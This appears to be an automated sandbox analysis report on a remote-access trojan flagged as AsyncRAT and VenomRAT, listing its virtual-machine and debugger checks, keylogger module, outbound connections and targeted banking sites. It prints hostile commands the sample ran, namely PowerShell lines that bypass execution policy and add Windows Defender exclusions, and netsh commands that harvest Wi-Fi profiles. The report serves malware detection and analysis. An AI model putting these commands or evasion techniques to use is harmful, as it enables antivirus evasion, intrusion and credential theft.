Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.VzhY4BcvBH.exe.31d6f70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.svchost.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VzhY4BcvBH.exe.31d6f70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2291428611.0000000003183000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.2259349303.0000000000162000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VzhY4BcvBH.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match

File source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\system32.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\system32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: VzhY4BcvBH.exe	Binary or memory string: SBIEDLL.DLLMHTTP://IP-API.COM/LINE/?FIELDS=HOSTING
Source: VzhY4BcvBH.exe, 00000000.00000002.2291428611.0000000003131000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: VzhY4BcvBH.exe, 00000000.00000002.2291428611.0000000003183000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.2259349303.0000000000162000.00000002.00000001.01000000.00000009.sdmp, svchost.exe.0.dr	Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Memory allocated: 1650000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Memory allocated: 1B130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Memory allocated: EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Memory allocated: 2D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Memory allocated: 1120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 990000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 1A5A0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6832	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2999	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Window / User API: threadDelayed 2683	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Window / User API: threadDelayed 7025	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7730	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1708	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Window / User API: threadDelayed 2218
Source: C:\Users\user\AppData\Roaming\svchost.exe	Window / User API: threadDelayed 7621

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe TID: 3168	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe TID: 4424	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2920	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe TID: 6252	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6496	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 6608	Thread sleep time: -35048813740048126s >= -30000s

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\AppData\Roaming\system32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\svchost.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Thread delayed: delay time: 922337203685477

Source: svchost.exe, 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: tmp4F5E.tmp.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: tmp4F5E.tmp.5.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: tmp4F5E.tmp.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: tmp4F5E.tmp.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: tmp4F5E.tmp.5.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: tmp4F5E.tmp.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: VzhY4BcvBH.exe	Binary or memory string: DetectVirtualMachine
Source: tmp4F5E.tmp.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: tmp4F5E.tmp.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: tmp4F5E.tmp.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: svchost.exe, 0000000A.00000002.4478728762.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4478728762.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, Info.txt.10.dr	Binary or memory string: VirtualMachine: False
Source: tmp4F5E.tmp.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: svchost.exe, 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VirtualMachine:
Source: tmp4F5E.tmp.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: tmp4F5E.tmp.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: tmp4F5E.tmp.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: tmp4F5E.tmp.5.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: tmp4F5E.tmp.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: svchost.exe, 0000000A.00000002.4513012447.000000001C00F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: system32.exe, 00000005.00000002.2325985099.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ
Source: tmp4F5E.tmp.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: tmp4F5E.tmp.5.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: tmp4F5E.tmp.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: tmp4F5E.tmp.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: tmp4F5E.tmp.5.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: VzhY4BcvBH.exe, 00000000.00000002.2313577645.000000001BE70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: tmp4F5E.tmp.5.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: VzhY4BcvBH.exe	Binary or memory string: vmware
Source: tmp4F5E.tmp.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: tmp4F5E.tmp.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: tmp4F5E.tmp.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: tmp4F5E.tmp.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: VzhY4BcvBH.exe	Binary or memory string: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ProgramMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstancem_ThreadStaticValueGetInstanceMainWorkFCodeCreateMutexDecompressinputGetTheResourceGet_GETPStrPWDPEmulatorDetectVirtualMachineDetectDebuggerDetectSandboxieanyrunGetModuleHandlelpModuleNameCheckRemoteDebuggerPresenthProcessisDebuggerPresentAdminCheckRunBotKillerSystem.DiagnosticsProcessRemoveFileprocessInspectionthreatIsWindowVisiblelHandleRegistryDeleteregPathpayloadhWndSystem.Collections.GenericList`1ListSystem.ThreadingMutex_appMutexspMTXSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeSystem.Runtime.InteropServicesComVisibleAttributeThreadStaticAttributeCompilerGeneratedAttributeStringIEnumerable`1ExceptionProcessStartInfoThreadSleepEnvironmentget_ExitCodeExitFailFastProjectDataSetProjectErrorClearProjectErrorGetCurrentProcessProcessModuleget_MainModuleget_FileNameset_FileNameset_Verbset_UseShellExecuteStartEnumeratorGetEnumeratorget_CurrentConversionsStringsCompareMethodSplitOperatorsConcatenateObjectSystem.IODirectoryExistsDirectoryInfoCreateDirectoryConvertToBooleanFileWriteAllBytesFileAttributesSetAttributesGCCollectMoveNextIDisposableDisposeReplaceSystem.Windows.FormsMessageBoxDialogResultMessageBoxButtonsMessageBoxIconShowMemoryStreamByteInt32BooleanNewLateBindingLateCallChangeTypeBitConverterToInt32StreamSystem.IO.CompressionGZipStreamCompressionModeSubtractObjectToIntegerSystem.ReflectionAssemblySystem.ResourcesResourceManagerGetExecutingAssemblyGetObjectContainsAppDomainget_CurrentDomainget_BaseDirectoryExpandEnvironmentVariablesProcessWindowStyleset_WindowStylePathGetFullPathConcatset_ArgumentsWaitForExitDateTimeget_Nowget_TicksSystem.CollectionsIEnumeratorSystem.ManagementManagementObjectSearcherLateGetIEnumerableLateIndexGetToLowerCompareStringToUpperInvariantget_HandleIntPtrSystem.NetWebClientDownloadStringSystem.Security.PrincipalWindowsIdentityGetCurrentWindowsPrincipalWindowsBuiltInRoleIsInRoleGetProcessesget_MainWindowHandleKillDeleteSpecialFolderGetFolderPathGetFileNameStartsWithInteractionEnvironget_SystemDirectoryGetPathRootCombineMicrosoft.Win32RegistryKeyRegistryCurrentUserOpenSubKeyGetValueNamesGetValueDeleteValueLocalMachineDllImportAttributekernel32.dllSTAThreadAttributeUser32.d
Source: tmp4F5E.tmp.5.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: tmp4F5E.tmp.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: tmp4F5E.tmp.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: tmp4F5E.tmp.5.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: tmp4F5E.tmp.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: tmp4F5E.tmp.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe

Code function: 0_2_00007FF848F362CD CheckRemoteDebuggerPresent,

0_2_00007FF848F362CD

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.159.136.232 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 208.95.112.1 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.16.185.241 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 172.67.196.114 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 212.87.215.19 1602

.NET source code references suspicious native API functions

Source: system32.exe.0.dr, NativeHelper.cs	Reference to suspicious API methods: LoadLibrary("kernel32")
Source: system32.exe.0.dr, NativeHelper.cs	Reference to suspicious API methods: GetProcAddress(hModule, "GetConsoleWindow")
Source: svchost.exe.0.dr, Keylogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: svchost.exe.0.dr, DInvokeCore.cs	Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: svchost.exe.0.dr, AntiProcess.cs	Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\system32.exe'
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\system32.exe'	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\system32.exe'

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\system32.exe'	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process created: C:\Users\user\AppData\Roaming\system32.exe "C:\Users\user\AppData\Roaming\system32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid

Source: svchost.exe, 0000000A.00000002.4478728762.00000000027BB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4478728762.0000000002B9A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: svchost.exe, 0000000A.00000002.4478728762.00000000027BB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4478728762.0000000002B9A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Queries volume information: C:\Users\user\Desktop\VzhY4BcvBH.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
